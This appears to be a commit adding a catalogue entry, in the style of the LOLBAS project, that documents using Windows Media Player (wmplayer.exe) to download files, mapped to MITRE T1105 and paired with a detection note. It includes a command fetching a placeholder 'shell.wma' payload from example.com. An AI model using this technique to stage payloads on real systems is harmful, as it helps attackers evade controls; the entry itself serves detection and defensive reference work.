Added technique using wmplayer.exe

This commit is contained in:
pampuna 2024-12-14 12:15:46 +00:00
parent baaa5bbc73
commit f8e6e4755f

View File

@ -0,0 +1,26 @@
---
Name: Wmplayer.exe
Description: Windows Media Player
Author: 'Rutger Flohil'
Created: 2024-12-14
Commands:
- Command: & "C:\Program Files (x86)\Windows Media Player\wmplayer.exe" "http://example.com/shell.wma"
Description: Windows Media Player will download the file and attempt to play it. File should be encoded and have a compatible extension like wma. Download is stored in INetCache and needs to be cleaned before use.
Usecase: Download file from the internet
Category: Download
Privileges: User
MitreID: T1105
OperatingSystem: Windows 10, Windows 11
Tags:
- Download: INetCache
Full_Path:
- Path: C:\Program Files\Windows Media Player\wmplayer.exe
- Path: C:\Program Files (x86)\Windows Media Player\wmplayer.exe
Code_Sample:
- Code: https://pampuna.nl/blog/2024/12/wmplayer.html
Detection:
- IOC: Network connections originating from wmplayer.exe may be suspicious
Resources:
- Link: https://pampuna.nl/blog/2024/12/wmplayer.html
- Person: Rutger Flohil
Handle: ''